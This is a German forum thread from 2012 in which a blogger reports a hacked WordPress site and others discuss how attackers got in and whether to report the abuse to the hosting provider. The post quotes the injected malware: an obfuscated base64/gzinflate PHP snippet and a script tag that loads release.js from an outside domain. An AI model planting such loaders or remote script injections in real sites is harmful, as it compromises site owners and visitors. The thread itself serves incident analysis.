Gehackt - Angriff zurück verfolgen?

Beitrag von **Liberty** » 04.03.2012, 15:39

Hallo, durch Zufall bin ich auf einen Hackingangriff auf meinen Wordpress Blog aufmerksam geworden. Irgendjemand hat ich Zugang auf meinen Webspace verschafft und einige Dateien geändert. Eingefügt wurde immer der Selbe Base64 Schadcode:

Code: Alles auswählen

#b58b6f#
echo&#40;gzinflate&#40;base64_decode&#40;“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”&#41;&#41;&#41;;
#/b58b6f#

Und in meinen RSS Feed wurde ein JS eingefügt:

Code: Alles auswählen

<script type=”text/javascript” src=”http&#58;//www.daysofyorr.com/release.js”></script><script type=”text/javascript” src=”http&#58;//www.daysofyorr.com/release.js”></script>

Der Angriff fand am 29.2. gegen 2:30 Uhr statt. Die manipulierten Dateien habe ich schnell bereinigt und alle Passwörter geändert. Über die Server Log habe ich die IP des Angreifer herausgefunden. Dabei handelt es sich um einen Server von Hetzner.

Über Google habe ich außerdem herausgefunden, dass mehrere Seiten zur selben Zeit infiziert wurden.

Wie kann ich herausfinden, wie dem Hacker der Angriff gelang? Und meint ihr eine Anzeige würde etwas bringen? Ich glaube ja der Hetzner Server wurde gehackt und missbraucht. Der Hacker wird bestimmt irgendwo im Ausland sitzen. Als Beweis habe ich ein komplettes Backup.

von **Anzeige von ABAKUS** »

Beitrag von **om-labs** » 04.03.2012, 15:41

eigener Server oder Webhosting bei Hetzner?

Beitrag von **Liberty** » 04.03.2012, 16:02

Webspace bei all-inkl

Beitrag von **om-labs** » 04.03.2012, 16:08

ach so, dein webspace bei all-inkl und der angreifer via Hetzner server.
Jetzt kapiert.
Na der Server Kunde wird es wohl nicht mitbekommen haben, das sein Server gehackt wurd und quasi als Proxy genutzt wird. Ne Mail an Hetzner wäre das erste was ich schreiben würde.

Bei Wordpress sind die typischen Einbruchstore falsche Datei und Ordnerberechtigungen und Codeeinschleusungen via SQL Injection oder XSS.
Gibt da ein paar Security Module die sowas abchecken. Bin aber auch kein Wordpress Freak. Nutze Drupal, da passiert das selten das gehackt wird.

Beitrag von **Liberty** » 04.03.2012, 16:27

Mail werde ich gleich fertig machen.

Für Wordpres nutze ich eine Login-Sperre und den Websitedefender, Order haben alle 755 Rechte, Dateien 644 bzw 640 die htaccess.

Beitrag von **mgutt** » 28.03.2012, 12:41

Bin auch gerade bei einem Kunden über den Angriff gestolpert. Bei ihm war es "myPHP Guestbook". Ich vermutete anfangs auch XSS/MySQL Injection, aber ich habe ein wenig recherchiert und finde es doch erstaunlich wie breit der Angriff war:
https://www.maxrev.de/release-js-virus- ... 247233.htm

Das deutet eher darauf hin, dass hier FTP Logins bekannt waren. Aber das widerspricht wiederum der Tatsache, dass nur bestimmte Dateien geändert wurden. Oder das System war so automatisiert, dass es mit einer Liste von Dateien gearbeitet hat, die auf bestimmte Softwares angepasst wurde. (also Header/Footer Templates, damit der Code auch immer brav ausgeworfen wird).

Hat jemand zufällig ein Backup von der Angriffsdatei? Ich würde mir das Scripte gerne mal anschauen und die ausgenutzten Lücken analysieren.